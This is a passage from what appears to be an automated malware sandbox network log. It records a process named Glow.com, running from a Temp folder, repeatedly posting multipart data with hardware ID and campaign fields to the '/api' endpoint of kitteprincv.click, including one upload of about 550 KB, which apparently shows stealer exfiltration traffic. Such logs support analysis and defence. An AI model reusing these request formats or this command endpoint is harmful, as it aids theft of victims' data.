name="pid"2--OCX7VZAWZQ7KITFAT1Content-Disposition: form-data; name="lid"MeHdy4--pl3cl
2024-12-21 12:02:11 UTC	2835	OUT	Data Raw: 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf Data Ascii: @xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe
2024-12-21 12:02:13 UTC	1144	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:02:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vndtanf3qrof39uq8v5686eqpt; expires=Wed, 16 Apr 2025 05:48:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BopaxbFpQ566z8YCTiEY1fAxeyn9qEwqqwwQK%2BgcvMv9szNyFq5k5Ml3JF0vSeJGo3YXwzMRsNUo6gqnjCSal%2BK0k5r7s%2FrUEQ1tT%2FrY%2B6bxJ5yh8%2BydIDE0%2BdrhHqV0p0WnVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57b8c8fb36c47a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1615&rtt_var=625&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19129&delivery_rate=1725768&cwnd=244&unsent_bytes=0&cid=cdd26f77434fbb17&ts=1224&x=0"
2024-12-21 12:02:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-21 12:02:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	104.21.43.127	443	7576	C:\Users\user\AppData\Local\Temp\600044\Glow.com

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:02:14 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3OQHAZ4VL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8733 Host: kitteprincv.click
2024-12-21 12:02:14 UTC	8733	OUT	Data Raw: 2d 2d 33 4f 51 48 41 5a 34 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 33 4f 51 48 41 5a 34 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 4f 51 48 41 5a 34 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 0d 0a 2d 2d 33 4f 51 48 41 5a 34 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --3OQHAZ4VLContent-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--3OQHAZ4VLContent-Disposition: form-data; name="pid"2--3OQHAZ4VLContent-Disposition: form-data; name="lid"MeHdy4--pl3clear--3OQHAZ4VLContent-D
2024-12-21 12:02:15 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:02:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rqe9nn8s98f0nam0gjsm6pvp7f; expires=Wed, 16 Apr 2025 05:48:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LUOOeRo%2Bnlz%2FH0FpdkrqpYd%2BYmMM1tlXtGH1ZjOKh26Y3IMwzAY1HgoaP3ndv9Fc16Ls1Laer13kj2ZwMX18KK0J6uQaxsAH9nDQJg0PgA1uK0MbX7pvEd0%2Bkjmca7Vei0Z2wg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57b8d8c9eb8c2f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1770&rtt_var=685&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9664&delivery_rate=1573275&cwnd=228&unsent_bytes=0&cid=515c4c563d4251c2&ts=796&x=0"
2024-12-21 12:02:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-21 12:02:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	104.21.43.127	443	7576	C:\Users\user\AppData\Local\Temp\600044\Glow.com

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:02:16 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=V7Y3TEP1KG1PO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20410 Host: kitteprincv.click
2024-12-21 12:02:16 UTC	15331	OUT	Data Raw: 2d 2d 56 37 59 33 54 45 50 31 4b 47 31 50 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 56 37 59 33 54 45 50 31 4b 47 31 50 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 37 59 33 54 45 50 31 4b 47 31 50 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 0d 0a 2d 2d 56 37 59 33 54 45 50 31 Data Ascii: --V7Y3TEP1KG1POContent-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--V7Y3TEP1KG1POContent-Disposition: form-data; name="pid"3--V7Y3TEP1KG1POContent-Disposition: form-data; name="lid"MeHdy4--pl3clear--V7Y3TEP1
2024-12-21 12:02:16 UTC	5079	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-21 12:02:17 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cojs74gv88l9ubfuqb6la4hr69; expires=Wed, 16 Apr 2025 05:48:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGZH8sx5ls0u2vBYShqu7Kvnxo%2BomYKFXtleTRclBLsue%2ByNBQKi2hU6UATqMwbsKsMF8nDK2NtEHr2lwoP8ciQWru1NJFi8MZz8KfQYPinLekXbOqeBjkMZ1CN1ze9j%2FhkAlw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57b8e65f8a42f7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2132&min_rtt=2130&rtt_var=804&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21368&delivery_rate=1356247&cwnd=171&unsent_bytes=0&cid=0681200ab8a2eabc&ts=950&x=0"
2024-12-21 12:02:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-21 12:02:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49750	104.21.43.127	443	7576	C:\Users\user\AppData\Local\Temp\600044\Glow.com

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:02:19 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=O6H956YO93QC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1226 Host: kitteprincv.click
2024-12-21 12:02:19 UTC	1226	OUT	Data Raw: 2d 2d 4f 36 48 39 35 36 59 4f 39 33 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 4f 36 48 39 35 36 59 4f 39 33 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 36 48 39 35 36 59 4f 39 33 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 0d 0a 2d 2d 4f 36 48 39 35 36 59 4f 39 33 51 Data Ascii: --O6H956YO93QCContent-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--O6H956YO93QCContent-Disposition: form-data; name="pid"1--O6H956YO93QCContent-Disposition: form-data; name="lid"MeHdy4--pl3clear--O6H956YO93Q
2024-12-21 12:02:19 UTC	1139	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:02:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mm7jmq6ujgk557ikr7tbrhs3ic; expires=Wed, 16 Apr 2025 05:48:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLri9ecKXSE8X%2Bk%2BW2h6%2BMUN44eFxmTlWrJi%2Fqh38SfEtFxTrQ48vwtCwMYksF6SqP8rFASUKwOoeXgWY5pHp%2Fk52B7tHhxw%2Ba%2BZ7loc8UeD1aRgS150Fds8Umn4mP8WIx0LJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57b8f73cd742ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1554&rtt_var=595&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2138&delivery_rate=1821584&cwnd=211&unsent_bytes=0&cid=9f7f9c443b3528b9&ts=1109&x=0"
2024-12-21 12:02:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-21 12:02:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49756	104.21.43.127	443	7576	C:\Users\user\AppData\Local\Temp\600044\Glow.com

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:02:21 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UZIPRQST3O1RGOF8R User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 553517 Host: kitteprincv.click
2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: 2d 2d 55 5a 49 50 52 51 53 54 33 4f 31 52 47 4f 46 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 55 5a 49 50 52 51 53 54 33 4f 31 52 47 4f 46 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 5a 49 50 52 51 53 54 33 4f 31 52 47 4f 46 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 Data Ascii: --UZIPRQST3O1RGOF8RContent-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--UZIPRQST3O1RGOF8RContent-Disposition: form-data; name="pid"1--UZIPRQST3O1RGOF8RContent-Disposition: form-data; name="lid"MeHdy4--pl3clear
2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: 6f 08 cd 7f e9 3c ae fd 6f 65 cf 08 ee 04 4e d6 b2 e2 19 ca 30 dd e3 54 aa 56 8a 1f 24 b5 f1 53 d7 31 26 4e 74 2f db f8 81 c9 a7 c0 f1 70 aa f2 fd f3 08 a8 37 44 69 28 7c 37 6e 18 f0 24 c7 c4 fa ff 5c 46 d8 57 01 34 71 39 37 db e2 2f 03 b6 4f f2 d1 69 6c 05 31 d3 05 ba a7 b1 40 ec 8a 3a ac 94 4f 48 0e f1 2d 38 eb 2c 28 10 20 4d 5c bf 31 7e 22 4e 80 36 5f ac 3e 15 7f 27 dc 6e 23 22 e0 58 d8 5e 86 d1 1f 42 b6 ce ce 07 51 c6 41 78 7d 50 d2 11 e4 3f 99 07 c1 d9 50 a5 14 fe 48 33 5c b8 1f 38 68 75 02 72 35 cf 5b 10 a9 be 71 69 51 e0 c6 bf 2d 1f 07 5c fa c6 fa de a5 8d d8 0f 39 bd 43 87 6a d6 6f 5c a5 42 05 f6 15 1d 26 25 57 13 43 5c 27 d3 a2 50 70 ef 7e 1f 11 23 4c 28 32 ed c4 d0 b4 1c 0c 48 f2 8f a7 e6 82 e2 60 47 97 35 87 06 0d fc 74 c0 d2 c1 f7 7d 7a 60 bb Data Ascii: o<oeN0TV$S1&Nt/p7Di(\|7n$\FW4q97/Oil1@:OH-8,( M\1~"N6_>'n#"X^BQAx}P?PH3\8hur5[qiQ-\9Cjo\B&%WC\'Pp~#L(2H`G5t}z`
2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: 8b 63 fa 51 4c 90 6d 37 07 13 56 d9 1a e6 ce 7b 39 a7 59 0a 29 1f 39 92 2f 86 79 8f 69 96 0e 19 c8 f3 b1 92 93 ba b4 d4 3a 91 52 2f d1 85 a9 d5 52 78 db 1a 8c 0f 18 ae a5 9a 70 bf 7f 1c 8f 2b 1b 9d 9c 9e 8e ae d3 9f 50 72 56 01 3b 1d 23 20 82 dc 3e 3c d5 32 90 a8 a2 a4 18 11 f7 eb fd 89 63 f2 91 06 4e 5d 86 38 bf e3 2a 7c 7e bc 7c b5 ae 0e ee 51 63 d9 af 77 19 04 fe bb 6a d6 d3 02 af 4a 78 78 34 3f 8f 78 2c 9a 5f 68 4d a9 6f 49 68 67 93 9c f6 ab 8d da 47 71 04 39 94 d0 1e 9c c9 43 dd 25 f1 4a 95 57 82 a9 2d 77 42 6b f7 e4 4f ca f5 f3 7f 57 cf 9a bc 32 fa fb 6c f4 d5 f4 90 7d 7c 77 83 44 fb a8 cd 86 cf 1b a3 61 7f f1 5f 8a b5 53 21 fc e8 9f cc ee 75 a7 2b 7e 8f 32 0d 11 9d 59 a2 59 b9 2d b2 42 eb c3 b1 c7 86 a0 ee a8 2d 91 a7 3b 0a 54 d2 59 ca 13 bc 74 91 Data Ascii: cQLm7V{9Y)9/yi:R/Rxp+PrV;# ><2cN]8*\|~\|QcwjJxx4?x,_hMoIhgGq9C%JW-wBkOW2l}\|wDa_S!u+~2YY-B-;TYt
2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: 4e 4c 8b b4 10 19 ee b8 ce 5d 54 01 3a e7 93 ab b8 5b 1b b8 e5 be 57 c7 6e 6f a0 a4 31 cd e8 e5 ad 67 b1 54 31 76 d9 cd dd f4 28 eb 4f cf f6 7e 42 c3 8c ca 25 97 03 1b 2f fa 05 7a 32 2b 3e 8f d4 54 bc fc 87 c5 e4 e6 c7 9e ae 9e 5a f9 e3 c4 a4 36 9f 13 ea 1a fb b9 f5 9b ea 6b ec 6e f3 8a 73 ed d3 fe 4c 6a de 5e e0 28 5c 04 30 b7 4e 03 c7 0b 3b 78 76 ea f4 ca 16 0a b3 dc 86 25 58 a5 07 da 38 1c 75 7c b8 cd d7 f5 47 f7 22 ac 26 e4 26 0b a4 81 6c 4c c8 2d af 79 88 6e 17 6a 6f f0 41 1d 3f d3 fb 86 dc 66 f2 34 dc 42 0b 38 7c fc b5 81 f8 08 53 e0 21 ff ff 1d 81 8e 64 8e 42 a0 0c 0d 35 19 80 6b 65 b9 88 c8 92 88 d4 2c 45 81 0b 21 4f b5 f9 d6 e8 e2 aa d8 57 af 14 87 b4 7e 00 c2 1e a2 23 e6 19 96 f8 65 d2 d5 83 1b 58 fc c4 30 4a 05 05 12 3f 72 42 6c 22 6c 12 43 0d Data Ascii: NL]T:[Wno1gT1v(O~B%/z2+>TZ6knsLj^(\0N;xv%X8u\|G"&&lL-ynjoA?f4B8\|S!dB5ke,E!OW~#eX0J?rBl"lC
2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: fd 43 24 66 cb 46 10 7b 84 c1 af 61 52 6e b2 cf 70 df 40 ce ab 92 b2 cf fd d3 44 39 88 b2 14 26 f5 8c 83 fe 5f 54 b8 4c 5f 9e f7 d2 b6 a7 11 e6 f9 32 f2 b5 0b 60 2a 61 4e c8 ab f9 3d 66 2c 23 d1 d4 9e f8 6f 24 02 4d 0d 15 db 23 8d 9d 47 79 a2 cd db 51 e6 4e 1a bf 2e e3 5f fa 6d bd 07 d1 1d e7 02 58 7d 08 12 cb 08 60 fa a6 d3 6d d6 cc ec ce 93 ab 27 38 d7 0c f0 f8 29 dd e0 af 92 81 58 1e 8c 30 a6 57 61 1c cd 88 2a ea 36 9a 93 fd 60 cd 68 32 c6 86 0b 35 ca 5b b9 67 3a 25 8d 8e 8c df 99 19 aa 88 df 7c 29 40 e1 e7 dc 19 0d c6 d6 93 6a af 33 99 11 7f 0f 92 eb 24 22 8d eb 10 ec 40 98 44 39 ea 12 91 d6 87 66 c4 95 ab a7 c3 f7 f8 96 9e f2 a9 48 26 5b da 67 24 e0 84 04 f7 33 4a f6 ec d2 e1 92 be cb 9a de 78 26 11 79 98 cf a4 ea c7 4a 93 d6 cd d5 cc d6 2d ee b0 26 Data Ascii: C$fF{aRnp@D9&_TL_2`aN=f,#o$M#GyQN._mX}`m'8)X0Wa6`h25[g:%\|)@j3$"@D9fH&[g$3Jx&yJ-&
2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: 12 e2 48 7d 2f 78 d8 3a 8f 9e 7d 9a 62 66 38 30 71 34 66 57 f5 df f7 bb 31 a4 24 35 53 39 ee 47 a2 6e 30 29 8e f4 ed 61 d4 f3 c3 b2 a2 c0 b1 49 6e 28 52 e7 eb b7 25 cb f4 8a 8e a6 78 ce 15 61 f1 1f 7f 73 3b 5c b1 77 e0 20 7f e8 04 26 d4 1f f5 63 01 17 9b 55 67 42 33 0f 9b 08 91 e0 cc 3f 09 ac f4 62 25 a8 5c 1b 07 cb be e9 15 85 d9 bb 65 60 43 0c fc 92 8b 5d 1f 25 3a d8 f6 ea 2c b1 ba be 5b c2 f6 c2 0b 2f 9e fe ef 30 cd f5 0c ec 1d 2e 69 11 fa 2b c4 4e 54 95 89 a4 c2 36 63 b5 a2 2c bb 75 b5 da 67 28 43 dd 0f f3 5e 1f dc 9f 7d e6 02 fa e6 1a e3 cc ce 4c 91 ab d0 4d aa ba e6 32 7a 16 bd 9c 33 63 73 94 4c 67 2d a9 d2 c6 00 78 8b 66 cc b3 fa 48 69 22 80 b0 47 2c 4a 89 9b dd b0 bd 36 f8 ef ba e4 48 0d b3 73 ea 67 82 dc 71 67 78 1f 68 50 d9 d9 ef 30 db 02 61 c0 Data Ascii: H}/x:}bf80q4fW1$5S9Gn0)aIn(R%xas;\w &cUgB3?b%\e`C]%:,[/0.i+NT6c,ug(C^}LM2z3csLg-xfHi"G,J6HsgqgxhP0a
2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: 11 96 07 2e 78 ff c1 8c 29 b8 b9 b2 14 6a c9 a3 e4 31 6c f3 ff ae 1d fb 9f a3 56 a7 b7 cf 7f bb 51 4d 4a 57 56 fc d3 2e e2 08 30 6c 0a 87 b0 a3 b8 a8 c9 11 1f ad e7 1f c7 e2 5d ee 04 7e 3b f2 68 69 2b d3 cb 78 9f c8 86 97 a3 80 42 75 cf 4b 6f 4c d1 f0 65 1c 1e f1 fd 77 3a 76 ac 78 c1 9c c4 ff 75 b3 1d 51 07 a4 9d aa 8c 6e 66 9b a7 fa 3e 71 70 e5 9f d4 1d b1 ce 3c 88 22 41 98 50 da 63 8f 1c 9b af 85 c0 ec b3 50 88 28 97 a5 0c 39 0a f7 9e e4 68 9d 4b e3 de eb 41 c7 f4 e1 5d 2e 12 03 79 ef 47 5a b4 6d 6a d6 8a 66 79 c8 95 ac 69 66 8e 50 a7 68 b8 8b 64 71 44 f5 11 60 31 9a a9 81 fa 8e ed fd 4b 1b ae 68 b8 8a 83 d4 1a b0 b1 57 23 cb 21 6b 47 7b 09 c0 53 e3 04 11 87 42 f0 ac 62 e7 ec 2c 91 49 d6 e1 c1 ef 57 28 95 bb 6e 2b 31 47 26 58 96 62 59 d8 b0 9f bf 5a fd Data Ascii: .x)j1lVQMJWV.0l]~;hi+xBuKoLew:vxuQnf>qp<"APcP(9hKA].yGZmjfyifPhdqD`1KhW#!kG{SBb,IW(n+1G&XbYZ
2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: d0 d5 10 74 93 86 75 d4 d5 b4 b8 72 76 12 f9 68 69 73 45 6f eb 93 ad da 37 bf 2c 08 29 09 32 56 6c 23 1e 1d 1c ce 5f 34 b0 e9 cd 2e ee 68 47 b7 fd 31 14 0c 02 8f a0 0c 87 bd a5 97 8a e5 52 46 5c 4e 6d 4a 23 3c 97 9d 33 8d 9b d0 a7 10 a1 91 58 2f a4 3a 75 35 3b 75 d7 1b 0c 70 39 bf 2e c7 8a 77 c6 cb 07 7f f7 85 b5 f1 c5 49 df 7c 87 f2 af 4d 65 b0 f4 76 ec 65 11 19 4d e8 26 59 45 04 53 b1 d7 20 61 a3 8a 43 b8 97 63 ba bf 7f 24 8a a2 30 7a 6b 95 5c 79 9c a3 57 5f cd 4d f9 07 f4 28 42 1a 46 c7 b4 56 aa 97 3d ac 2d 71 62 22 c3 ea 53 42 38 b7 8f 3f b9 c0 aa 74 70 ea 48 ee 91 d0 e4 23 27 cf ff 3b 6d c6 22 ad 8b ee b0 23 4a be b1 c5 b6 cd ca 45 ad f4 9c 86 32 b2 7d 12 77 5e 5c 9a 36 1c fd 64 07 7d e6 79 02 9f c5 82 79 e1 be f4 73 40 6b e1 00 b1 04 81 38 ca bb 29 Data Ascii: turvhisEo7,)2Vl#_4.hG1RF\NmJ#<3X/:u5;up9.wI\|MeveM&YES aCc$0zk\yW_M(BFV=-qb"SB8?tpH#';m"#JE2}w^\6d}yys@k8)
